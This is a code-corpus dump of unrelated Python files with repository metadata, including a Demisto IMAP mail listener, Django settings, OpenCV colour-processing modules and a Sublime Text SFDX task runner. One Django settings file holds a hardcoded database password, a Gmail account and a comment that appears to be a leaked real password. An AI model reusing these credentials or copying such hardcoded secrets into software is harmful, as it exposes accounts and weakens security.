mails_fetched, _, _ = fetch_mails(client, message_id=message_id)
mails_json = [mail.generate_raw_json(parse_attachments=True) for mail in mails_fetched]
return CommandResults(outputs_prefix='MailListener.Email',
outputs_key_field='ID',
outputs=mails_json)
def get_email_as_eml(client: IMAPClient, message_id: int) -> dict:
mails_fetched, _, _ = fetch_mails(client, message_id=message_id)
mail_file = [fileResult('original-email-file.eml', mail.mail_bytes) for mail in mails_fetched]
return mail_file[0] if mail_file else {}
def _convert_to_bytes(data) -> bytes:
demisto.debug("Converting data to bytes.")
bytes_data = bytes(data)
demisto.debug("Converted data successfully.")
return bytes_data
def main():
params = demisto.params()
mail_server_url = params.get('MailServerURL')
port = int(params.get('port'))
folder = params.get('folder')
username = demisto.params().get('credentials').get('identifier')
password = demisto.params().get('credentials').get('password')
verify_ssl = not params.get('insecure', False)
tls_connection = params.get('TLS_connection', True)
include_raw_body = demisto.params().get('Include_raw_body', False)
permitted_from_addresses = demisto.params().get('permittedFromAdd', '')
permitted_from_domains = demisto.params().get('permittedFromDomain', '')
with_headers = params.get('with_headers')
delete_processed = demisto.params().get("delete_processed", False)
limit = min(int(demisto.params().get('limit', '50')), 200)
save_file = params.get('save_file', False)
first_fetch_time = demisto.params().get('first_fetch', '3 days').strip()
ssl_context = ssl.create_default_context()
args = demisto.args()
if not verify_ssl:
ssl_context.check_hostname = False
ssl_context.verify_mode = ssl.CERT_NONE
LOG(f'Command being called is {demisto.command()}')
try:
with IMAPClient(mail_server_url, ssl=tls_connection, port=port, ssl_context=ssl_context) as client:
client.login(username, password)
client.select_folder(folder)
if demisto.command() == 'test-module':
result = test_module(client)
demisto.results(result)
elif demisto.command() == 'mail-listener-list-emails':
return_results(list_emails(client=client,
first_fetch_time=first_fetch_time,
with_headers=with_headers,
permitted_from_addresses=permitted_from_addresses,
permitted_from_domains=permitted_from_domains))
elif demisto.command() == 'mail-listener-get-email':
return_results(get_email(client=client,
message_id=args.get('message-id')))
elif demisto.command() == 'mail-listener-get-email-as-eml':
return_results(get_email_as_eml(client=client,
message_id=args.get('message-id')))
elif demisto.command() == 'fetch-incidents':
next_run, incidents = fetch_incidents(client=client, last_run=demisto.getLastRun(),
first_fetch_time=first_fetch_time,
include_raw_body=include_raw_body,
with_headers=with_headers,
permitted_from_addresses=permitted_from_addresses,
permitted_from_domains=permitted_from_domains,
delete_processed=delete_processed, limit=limit,
save_file=save_file)
demisto.setLastRun(next_run)
demisto.incidents(incidents)
except Exception as e:
return_error(f'Failed to execute {demisto.command()} command. Error: {str(e)}')
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| 46.384016
| 125
| 0.624837
|
923981d45eada08a99e1be05199a0c9e8d63807b
| 3,305
|
py
|
Python
|
django-hosting-heroku/source_code_step_8/portfolio-project/portfolio/settings.py
|
syberflea/materials
|
54f44725b40edf00c1b523d7a85b34a85014d7eb
|
[
"MIT"
] | 3,682
|
2018-05-07T19:45:24.000Z
|
2022-03-31T15:19:10.000Z
|
django-hosting-heroku/source_code_step_8/portfolio-project/portfolio/settings.py
|
sribarrow/materials
|
c17c4a4d6f8487e59eac1df8c88ca92b73d6d2a5
|
[
"MIT"
] | 148
|
2018-05-15T21:18:49.000Z
|
2022-03-21T11:25:39.000Z
|
django-hosting-heroku/source_code_step_8/portfolio-project/portfolio/settings.py
|
sribarrow/materials
|
c17c4a4d6f8487e59eac1df8c88ca92b73d6d2a5
|
[
"MIT"
] | 5,535
|
2018-05-25T23:36:08.000Z
|
2022-03-31T16:55:52.000Z
|
"""
Django settings for portfolio project.
Generated by 'django-admin startproject' using Django 3.2.5.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# SECRET_KEY = 'django-insecure-=bad%3%tbrw8(ohgu2uyi7)acv!$1br3=j-o)i@b+1d9g-sd1('
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "portfolio.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
WSGI_APPLICATION = "portfolio.wsgi.application"
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": BASE_DIR / "db.sqlite3",
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{
"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
},
{
"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = "/static/"
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = "django.db.models.BigAutoField"
import django_heroku
django_heroku.settings(locals())
| 25.620155
| 91
| 0.70348
|
678cb203c531e84262cace95f461490fb246560f
| 1,034
|
py
|
Python
|
nlp/text_processing.py
|
innaiivanova/chatbot
|
03ed98dfc24b36620db96094e8970a48010a9379
|
[
"MIT"
] | null | null | null |
nlp/text_processing.py
|
innaiivanova/chatbot
|
03ed98dfc24b36620db96094e8970a48010a9379
|
[
"MIT"
] | null | null | null |
nlp/text_processing.py
|
innaiivanova/chatbot
|
03ed98dfc24b36620db96094e8970a48010a9379
|
[
"MIT"
] | null | null | null |
# Codecademy's text processing
# Inna I. Ivanova
# regex for removing punctuation!
import re
# nltk preprocessing magic
import nltk
from nltk.tokenize import word_tokenize
from nltk.stem import PorterStemmer
from nltk.stem import WordNetLemmatizer
# grabbing a part of speech function:
from part_of_speech import get_part_of_speech
text = "So many squids are jumping out of suitcases these days that you can barely go anywhere without seeing one burst forth from a tightly packed valise. I went to the dentist the other day, and sure enough I saw an angry one jump out of my dentist's bag within minutes of arriving. She hardly even noticed."
cleaned = re.sub('\W+', ' ', text)
tokenized = word_tokenize(cleaned)
stemmer = PorterStemmer()
stemmed = [stemmer.stem(token) for token in tokenized]
## -- CHANGE these -- ##
lemmatizer = WordNetLemmatizer()
lemmatized = [lemmatizer.lemmatize(token,get_part_of_speech(token)) for token in tokenized]
print("Stemmed text:")
print(stemmed)
print("\nLemmatized text:")
print(lemmatized)
| 34.466667
| 310
| 0.779497
|
a6f95160a321b5ee7ecf20688e9f38ec4cc42de6
| 574
|
py
|
Python
|
otcore/hit/migrations/0006_auto_20160520_1810.py
|
NYULibraries/dlts-enm-tct-backend
|
07455a660fb2cb8bc91a54f7f12d150923678157
|
[
"Apache-2.0"
] | null | null | null |
otcore/hit/migrations/0006_auto_20160520_1810.py
|
NYULibraries/dlts-enm-tct-backend
|
07455a660fb2cb8bc91a54f7f12d150923678157
|
[
"Apache-2.0"
] | 2
|
2017-10-30T21:19:07.000Z
|
2017-10-31T18:06:30.000Z
|
otcore/hit/migrations/0006_auto_20160520_1810.py
|
NYULibraries/dlts-enm-tct-backend
|
07455a660fb2cb8bc91a54f7f12d150923678157
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-20 22:10
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('hit', '0005_auto_20160519_1412'),
]
operations = [
migrations.AlterField(
model_name='hit',
name='basket',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='topic_name', to='hit.Basket'),
),
]
| 26.090909
| 148
| 0.65331
|
7f4c27af05ccdd9010728e67532f5c8a7b28c57e
| 57
|
py
|
Python
|
tia/analysis/__init__.py
|
AmarisAI/tia
|
a7043b6383e557aeea8fc7112bbffd6e36a230e9
|
[
"BSD-3-Clause"
] | 366
|
2015-01-21T21:57:23.000Z
|
2022-03-29T09:11:24.000Z
|
tia/analysis/__init__.py
|
AmarisAI/tia
|
a7043b6383e557aeea8fc7112bbffd6e36a230e9
|
[
"BSD-3-Clause"
] | 51
|
2015-03-01T14:20:44.000Z
|
2021-08-19T15:46:51.000Z
|
tia/analysis/__init__.py
|
AmarisAI/tia
|
a7043b6383e557aeea8fc7112bbffd6e36a230e9
|
[
"BSD-3-Clause"
] | 160
|
2015-02-22T07:16:17.000Z
|
2022-03-29T13:41:15.000Z
|
import tia.analysis.perf
from tia.analysis.model import *
| 28.5
| 32
| 0.824561
|
512f8877613a414c7394fc69ec1ec1bffcc0907d
| 451
|
py
|
Python
|
config.py
|
VigneshTirukkonda/dig1ts
|
3b3ca56863f974a5386e9dad5acf8d909e5086db
|
[
"MIT"
] | null | null | null |
config.py
|
VigneshTirukkonda/dig1ts
|
3b3ca56863f974a5386e9dad5acf8d909e5086db
|
[
"MIT"
] | null | null | null |
config.py
|
VigneshTirukkonda/dig1ts
|
3b3ca56863f974a5386e9dad5acf8d909e5086db
|
[
"MIT"
] | null | null | null |
# TRAIN_PATH = '/Users/roshantirukkonda/Desktop/Kaggle /Pytorch CNN MNIST/Input/MNIST/processed/training.pt'
# TEST_PATH = '/Users/roshantirukkonda/Desktop/Kaggle /Pytorch CNN MNIST/Input/MNIST/processed/test.pt'
ROOT = '../Input'
MODEL_PATH = '../Input/Model'
LATEST_MODEL = '/CNN-2021-02-26 02:47:01.247436.pt'
TEST_PATH = '../Input/TEST'
EPOCHS = 5
SPLIT = [60000, 0]
IMG_DIM = 28, 28
BATCH_SIZE = 8
NUM_CLASSES = 10
LR = 0.001
MOMENTUM = 0.9
| 23.736842
| 108
| 0.718404
|
aa28f5725222cf0ad073b343b15ec3efb7d2772d
| 9,021
|
py
|
Python
|
opsi/modules/color.py
|
frcmi/opensight
|
3b0c0c63a877f739a1ee8261a9befbb44a3b7796
|
[
"MIT"
] | 48
|
2019-09-22T07:08:35.000Z
|
2022-01-15T16:19:42.000Z
|
opsi/modules/color.py
|
frcmi/opensight
|
3b0c0c63a877f739a1ee8261a9befbb44a3b7796
|
[
"MIT"
] | 16
|
2019-10-02T18:48:59.000Z
|
2020-12-06T04:23:03.000Z
|
opsi/modules/color.py
|
frcmi/opensight
|
3b0c0c63a877f739a1ee8261a9befbb44a3b7796
|
[
"MIT"
] | 11
|
2019-09-19T15:57:06.000Z
|
2020-08-12T01:08:44.000Z
|
from dataclasses import dataclass
import cv2
import numpy as np
from opsi.manager.manager_schema import Function
from opsi.manager.types import RangeType, Slide
from opsi.util.cv import Mat, MatBW
from opsi.util.cv.mat import Color
from opsi.util.cv.shape import Point
__package__ = "opsi.colorops"
__version__ = "0.123"
class Blur(Function):
@dataclass
class Settings:
radius: int
@dataclass
class Inputs:
img: Mat
@dataclass
class Outputs:
img: Mat
def run(self, inputs):
img = inputs.img.mat.blur(self.settings.radius)
return self.Outputs(img=img)
class HSVRange(Function):
@dataclass
class Settings:
hue: RangeType(0, 359)
sat: RangeType(0, 255)
val: RangeType(0, 255)
@dataclass
class Inputs:
img: Mat
@dataclass
class Outputs:
imgBW: MatBW
def run(self, inputs):
imgBW = inputs.img.mat.hsv_threshold(
self.settings.hue, self.settings.sat, self.settings.val
)
return self.Outputs(imgBW=imgBW)
class Greyscale(Function):
@dataclass
class Inputs:
img: Mat
@dataclass
class Outputs:
img: Mat
def run(self, inputs):
img = inputs.img.mat.greyscale
return self.Outputs(img=img)
class Canny(Function):
@dataclass
class Settings:
threshold: RangeType(0, 255)
@dataclass
class Inputs:
img: Mat
@dataclass
class Outputs:
imgBW: MatBW
def run(self, inputs):
return self.Outputs(
imgBW=inputs.img.mat.canny(
self.settings.threshold[0], self.settings.threshold[1]
)
)
class AbsoluteDifferenceRGB(Function):
@dataclass
class Settings:
red: Slide(min=0, max=255, decimal=False)
green: Slide(min=0, max=255, decimal=False)
blue: Slide(min=0, max=255, decimal=False)
to_greyscale: bool
clamp_max: bool
clamp_value: Slide(min=0, max=255, decimal=False)
@dataclass
class Inputs:
img: Mat
@dataclass
class Outputs:
img: Mat
def run(self, inputs):
diff = inputs.img.mat.abs_diff(
np.array(
[self.settings.blue, self.settings.green, self.settings.red],
dtype=np.float,
)[None],
)
if self.settings.to_greyscale:
diff = diff.greyscale
if self.settings.clamp_max:
diff = Mat(np.minimum(diff.img, self.settings.clamp_value))
return self.Outputs(img=diff)
class AbsoluteDifferenceHSV(Function):
@dataclass
class Settings:
hue: Slide(min=0, max=359, decimal=False)
hue_sensitivity: int
sat: Slide(min=0, max=255, decimal=False)
sat_sensitivity: int
val: Slide(min=0, max=255, decimal=False)
val_sensitivity: int
clamp_max: bool
clamp_value: Slide(min=0, max=255, decimal=False)
@dataclass
class Inputs:
img: Mat
@dataclass
class Outputs:
img: Mat
def run(self, inputs):
img_hsv = inputs.img.mat.hsv
diff_hsv = img_hsv.abs_diff(
np.array(
[self.settings.hue, self.settings.sat, self.settings.val],
dtype=np.float,
)[
None
], # [None] adds a dimension to the ndarray object created by np.array() -
# See https://stackoverflow.com/questions/37867354/in-numpy-what-does-selection-by-none-do
)
scaled_diff = np.multiply(
diff_hsv,
np.array(
[
self.settings.hue_sensitivity,
self.settings.sat_sensitivity,
self.settings.val_sensitivity,
],
dtype=np.uint16,
),
).astype(np.uint16)
greyscale = Mat(scaled_diff).greyscale
if self.settings.clamp_max:
greyscale = Mat(
np.minimum(greyscale.img, self.settings.clamp_value).astype(np.uint8)
)
else:
greyscale = Mat(np.minimum(greyscale.img, 255).astype(np.uint8))
return self.Outputs(img=greyscale)
class ClampMax(Function):
@dataclass
class Settings:
max_value: Slide(min=0, max=255, decimal=False)
@dataclass
class Inputs:
img: Mat
@dataclass
class Outputs:
img: Mat
def run(self, inputs):
return self.Outputs(img=np.minimum(inputs.img, self.settings.max_value))
class ClampMin(Function):
@dataclass
class Settings:
min_value: Slide(min=0, max=255, decimal=False)
@dataclass
class Inputs:
img: Mat
@dataclass
class Outputs:
img: Mat
def run(self, inputs):
return self.Outputs(img=np.maximum(inputs.img, self.settings.min_value))
class ColorSampler(Function):
@dataclass
class Settings:
x_pct: Slide(min=0, max=100)
y_pct: Slide(min=0, max=100)
draw_color: bool
draw_hsv: bool
@dataclass
class Inputs:
img: Mat
@dataclass
class Outputs:
color: Color
img: Mat
def run(self, inputs):
# Find the pixel coordinates to sample in the image
height, width = inputs.img.mat.img.shape[:2]
sample_coords = (
int(width * self.settings.x_pct / 100.0 + 10),
int(height * self.settings.y_pct / 100.0 + 10),
)
color_bgr = inputs.img.mat.img[sample_coords[1], sample_coords[0]]
draw = inputs.img.mat
if self.settings.draw_color:
draw = np.copy(inputs.img.mat.img)
# Draw a small circle (of radius 5) to show the point.
cv2.circle(draw, sample_coords, 5, (0, 0, 255), 3)
# Find the color in HSV to make a contrasting color
color_hsv = Mat(np.uint8([[color_bgr]])).img[0][0]
color_hsv[0] *= 2 # Scale the hue value to be in a range of 0-359
# Create a string to represent the color in either RGB or HSV
if self.settings.draw_hsv:
color_str = "H{} S{} V{}".format(*color_hsv)
else:
color_str = "B{} G{} R{}".format(*color_bgr)
# Choose a (Hopefully) Contrasting color
draw_color = (
int(255 - color_bgr[0]),
int(255 - color_bgr[1]),
int(255 - color_bgr[2]),
)
cv2.putText(
draw,
color_str,
(sample_coords[0] + 10, sample_coords[1] + 10),
cv2.FONT_HERSHEY_SIMPLEX,
0.5,
draw_color,
lineType=cv2.LINE_AA,
)
draw = Mat(draw)
color = Color(color_bgr[2], color_bgr[1], color_bgr[0])
return self.Outputs(color=color, img=draw)
class ColorDetector(Function):
@dataclass
class Settings:
red_hue: Slide(min=0, max=359, decimal=False)
yellow_hue: Slide(min=0, max=359, decimal=False)
green_hue: Slide(min=0, max=359, decimal=False)
blue_hue: Slide(min=0, max=359, decimal=False)
@dataclass
class Inputs:
color: Color
@dataclass
class Outputs:
color_string: str
def run(self, inputs):
def hue_dist(test: int, reference: int):
return min(abs(reference - test), abs(reference + 360 - test))
color_hue = (
Mat(
np.uint8([[[inputs.color.blue, inputs.color.green, inputs.color.red]]])
).hsv.img[0][0][0]
* 2
)
hue_strings = {
self.settings.red_hue: "R",
self.settings.yellow_hue: "Y",
self.settings.green_hue: "G",
self.settings.blue_hue: "B",
}
output_str = ""
min_dist = 360
for hue in hue_strings.keys():
dist = hue_dist(hue, color_hue)
if dist < min_dist:
min_dist = dist
output_str = hue_strings[hue]
return self.Outputs(color_string=output_str)
class Resize(Function):
@dataclass
class Settings:
width: int
height: int
@dataclass
class Inputs:
img: Mat
@dataclass
class Outputs:
img: Mat
def run(self, inputs):
img = inputs.img.mat.resize(Point(self.settings.width, self.settings.height))
return self.Outputs(img=img)
class ColorBalance(Function):
@dataclass
class Settings:
red_balance: Slide(min=0, max=100)
blue_balance: Slide(min=0, max=100)
@dataclass
class Inputs:
img: Mat
@dataclass
class Outputs:
img: Mat
def run(self, inputs):
img = inputs.img.mat.color_balance(
self.settings.red_balance / 100.0, self.settings.blue_balance / 100.0
)
return self.Outputs(img=img)
| 24.580381
| 102
| 0.567232
|
89b9a597f059384e4295580394d81233e493f88b
| 8,547
|
py
|
Python
|
sfdx.py
|
iechenybsh/exiahuangl
|
6834ec0d40a53ece3c0ff738c5b728616da26a02
|
[
"Apache-2.0"
] | 29
|
2016-12-15T07:14:44.000Z
|
2022-03-17T17:24:08.000Z
|
sfdx.py
|
iechenybsh/exiahuangl
|
6834ec0d40a53ece3c0ff738c5b728616da26a02
|
[
"Apache-2.0"
] | 5
|
2017-02-14T02:04:44.000Z
|
2019-02-19T19:25:22.000Z
|
sfdx.py
|
iechenybsh/exiahuangl
|
6834ec0d40a53ece3c0ff738c5b728616da26a02
|
[
"Apache-2.0"
] | 12
|
2016-12-16T08:02:45.000Z
|
2020-02-20T00:00:58.000Z
|
import sublime
import sublime_plugin
import os, re
import json
from .setting import SfBasicConfig
from .uiutil import SublConsole
from . import util
SFDX_SETTINGS = "sfdx.sublime-settings"
class OpenSfdxSettingCommand(sublime_plugin.WindowCommand):
def run(self):
SETTING_PATH = os.path.join(sublime.packages_path(), "User", SFDX_SETTINGS)
if not os.path.exists(SETTING_PATH):
s = sublime.load_settings(SFDX_SETTINGS)
tasks = s.get("tasks")
custom_env = s.get("custom_env")
s.set("tasks", tasks)
s.set("custom_env", custom_env)
sublime.save_settings(SFDX_SETTINGS)
self.window.run_command("open_file", {
"file": SETTING_PATH
})
class SfdxCommand(sublime_plugin.WindowCommand):
def run(self):
self.sf_basic_config = SfBasicConfig()
self.settings = self.sf_basic_config.get_setting()
self.sublconsole = SublConsole(self.sf_basic_config)
self.window = sublime.active_window()
self.osutil = util.OsUtil(self.sf_basic_config)
s = sublime.load_settings(SFDX_SETTINGS)
tasks = s.get("tasks")
self.env = s.get("custom_env")
self.env.update(DxEnv().get_env())
self.env.update(CommandEnv(self.window, self.sf_basic_config.get_project_dir()).get_env())
self.sel_keys = [task["label"] for task in tasks]
self.sel_vals = [task for task in tasks]
self.window.show_quick_panel(self.sel_keys, self.panel_done, sublime.MONOSPACE_FONT)
def panel_done(self, picked):
if 0 > picked < len(self.sel_keys):
return
self.task = self.sel_vals[picked]
is_os_termial = "os_termial" in self.task and self.task["os_termial"]
if "SFDX_ALIAS" in self.task["command"]:
if not self.env["SFDX_ALIAS"] or len(self.env["SFDX_ALIAS"]) == 0:
self.sublconsole.showlog("sfdx alias empty! please check it!")
Cmder().run(self.window, self.env, self.task["command"], console=self.sublconsole.showlog, is_os_termial=is_os_termial, encoding='UTF-8')
class DxEnv():
def get_env(self):
return {
"SFDX_ALIAS" : self.__get_alias(),
}
def __get_alias(self):
return list(self.__get_alias_dict().keys())
def __get_alias_dict(self):
home = os.path.expanduser("~")
dx_alias_file = os.path.join(home, ".sfdx", "alias.json")
alias = {}
try:
if os.path.exists(dx_alias_file):
f = open(dx_alias_file)
data = json.load(f)
alias = data["orgs"]
f.close()
except Exception as ex:
pass
return alias
class CommandEnv():
def __init__(self, window, workspaceFolder):
self.window = window
self.workspaceFolder = workspaceFolder
def get_env(self):
# // ${selectedText} - the current selected text in the active file
file = self.window.active_view().file_name()
if file is None : file = ""
fileBasenameNoExtension, fileExtname = os.path.splitext(os.path.basename(file))
env = {
"cwd" : self.workspaceFolder,
"workspaceFolder" : self.workspaceFolder,
"workspaceFolderBasename" : os.path.basename(self.workspaceFolder),
"file" : file,
"fileBasenameNoExtension": fileBasenameNoExtension,
"fileExtname": fileExtname,
"relativeFile" : file.replace(self.workspaceFolder, ""),
"fileBasename": os.path.basename(file),
"fileDirname" : os.path.dirname(file),
"selectedText" : self.__get_sel_text(),
}
# print(env)
return env
def __get_sel_text(self):
try:
view = self.window.active_view()
sel = view.sel()
region1 = sel[0]
selectionText = view.substr(region1)
return selectionText
except Exception as ex:
pass
return ""
class Cmder():
def run(self, window, command_env, command, console=print, is_os_termial=False, encoding='UTF-8'):
self.index = 0
self.window = window
self.console = console
self.encoding = encoding
self.is_os_termial = is_os_termial
self.env = command_env
self.command = command
self.params = self.__get_command_params(command)
self.osutil = util.OsUtil()
UiWizard(command_params=self.params,
window=self.window,
callback=self.on_wizard_done).run()
def on_wizard_done(self, user_params):
command = self.command
for key, val in self.env.items():
if type(val) is str:
command = command.replace("${%s}" % key, val)
msgs = []
for param in self.__get_sys_env(command):
command = command.replace(param["param"], param["value"])
if not param["value"]: msgs.append("%s is null! please check it." % param["param"])
for param in user_params:
command = command.replace(param["param"], param["value"])
if not param["value"]: msgs.append("%s is null! please check it." % param["param"])
if len(msgs) > 0:
self.console("\n".join(msgs))
else:
self.console(command)
cmds = [self.osutil.get_cd_cmd(self.env["workspaceFolder"]), command]
if self.is_os_termial:
self.osutil.run_in_os_termial(cmds)
else:
self.osutil.run_in_sublime_cmd(cmds, encoding=self.encoding)
def __get_sys_env(self, command):
pattern = r"\${(env)(\s)*:(\s)*([^} ]+)(\s)*}"
matchedList = re.findall(pattern, command)
sys_env = []
if matchedList:
for param in matchedList:
key = param[3]
sys_env.append({
"param" : "${%s%s:%s%s%s}" % param,
"key" : key,
"value" : os.getenv(key, default=""),
"type" : param[0]
})
return sys_env
def __get_command_params(self, command):
pattern = r"\${(input|select)(\s)*:(\s)*([^} ]+)(\s)*}"
matchedList = re.findall(pattern, command)
params = []
if matchedList:
for param in matchedList:
key = param[3]
data = {
"param" : "${%s%s:%s%s%s}" % param,
"key" : key,
"value" : "",
"type" : param[0]
}
if data["type"] == "input":
if key in self.env:
data["value"] = str(self.env[key])
elif data["type"] == "select":
data["option"] = data["option-v"] = []
if key in self.env:
if isinstance(self.env[key], list):
data["option"] = data["option-v"] = self.env[key]
params.append(data)
return params
class UiWizard():
def __init__(self, command_params, window, callback):
self.index = 0
self.command_params = command_params
self.window = window
self.callback = callback
def run(self, args=None):
if self.index > 0:
pre_data = self.command_params[self.index-1]
ui_type = pre_data["type"]
if ui_type == "input":
pre_data["value"] = args
elif ui_type == "select":
if 0 <= args and args < len(pre_data["option-v"]):
pre_data["value"] = pre_data["option-v"][args]
if self.index < len(self.command_params):
curr_data = self.command_params[self.index]
if curr_data["type"] == "input":
caption = "Please Input your %s: " % curr_data["key"]
self.window.show_input_panel(caption, curr_data["value"], self.run, None, None)
elif curr_data["type"] == "select":
show_opts = curr_data["option"]
self.window.show_quick_panel(show_opts, self.run, sublime.MONOSPACE_FONT)
self.index = self.index + 1
else:
self.callback(self.command_params)
class XyOpenUrlCommand(sublime_plugin.ApplicationCommand):
def run(command, url):
import webbrowser
webbrowser.open_new_tab(url)
| 37
| 145
| 0.558676
|
4336218e01685ceb7ebf5eb61a177f01229df672
| 3,914
|
py
|
Python
|
core/settings.py
|
piyushjain-pj/pneumonia_and_covid_prediction_tool
|
b5f503b1672b1093c4bd6f9e053d6024e4f73f9d
|
[
"MIT"
] | 1
|
2022-03-30T15:28:33.000Z
|
2022-03-30T15:28:33.000Z
|
core/settings.py
|
piyushjain-pj/pneumonia_and_covid_prediction_tool
|
b5f503b1672b1093c4bd6f9e053d6024e4f73f9d
|
[
"MIT"
] | null | null | null |
core/settings.py
|
piyushjain-pj/pneumonia_and_covid_prediction_tool
|
b5f503b1672b1093c4bd6f9e053d6024e4f73f9d
|
[
"MIT"
] | null | null | null |
import os
from decouple import config
from unipath import Path
import dj_database_url
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = Path(__file__).parent
CORE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config('SECRET_KEY', default='S#perS3crEt_1122')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config('DEBUG', default=True, cast=bool)
# load production server from .env
ALLOWED_HOSTS = ['localhost', '127.0.0.1', config('SERVER', default='127.0.0.1')]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app' # Enable the inner app
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'core.urls'
LOGIN_REDIRECT_URL = "home" # Route defined in app/urls.py
LOGOUT_REDIRECT_URL = "home" # Route defined in app/urls.py
TEMPLATE_DIR = os.path.join(CORE_DIR, "core/templates") # ROOT dir for templates
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'core.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'djangonew',
'USER': 'root',
'PASSWORD': 'root',
'HOST': 'localhost',
'PORT': '3307',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Email Configuration
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_USE_TLS = True
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = 'cnpptool@gmail.com'
EMAIL_HOST_PASSWORD = "password"
EMAIL_PORT = 587
# 'Piyush@12345'
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
#############################################################
# SRC: https://devcenter.heroku.com/articles/django-assets
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_ROOT = os.path.join(CORE_DIR, 'staticfiles')
STATIC_URL = '/static/'
# Extra places for collectstatic to find static files.
STATICFILES_DIRS = (
os.path.join(CORE_DIR, 'core/static'),
)
#############################################################
#############################################################
| 29.428571
| 91
| 0.664027
|
197fc8950e489be9f03d27ae2510032afa686787
| 18,818
|
py
|
Python
|
log_complete/model_301.py
|
LoLab-VU/Bayesian_Inference_of_Network_Dynamics
|
54a5ef7e868be34289836bbbb024a2963c0c9c86
|
[
"MIT"
] | null | null | null |
log_complete/model_301.py
|
LoLab-VU/Bayesian_Inference_of_Network_Dynamics
|
54a5ef7e868be34289836bbbb024a2963c0c9c86
|
[
"MIT"
] | null | null | null |
log_complete/model_301.py
|
LoLab-VU/Bayesian_Inference_of_Network_Dynamics
|
54a5ef7e868be34289836bbbb024a2963c0c9c86
|
[
"MIT"
] | null | null | null |
# exported from PySB model 'model'
from pysb import Model, Monomer, Parameter, Expression, Compartment, Rule, Observable, Initial, MatchOnce, Annotation, ANY, WILD
Model()
Monomer('Ligand', ['Receptor'])
Monomer('ParpU', ['C3A'])
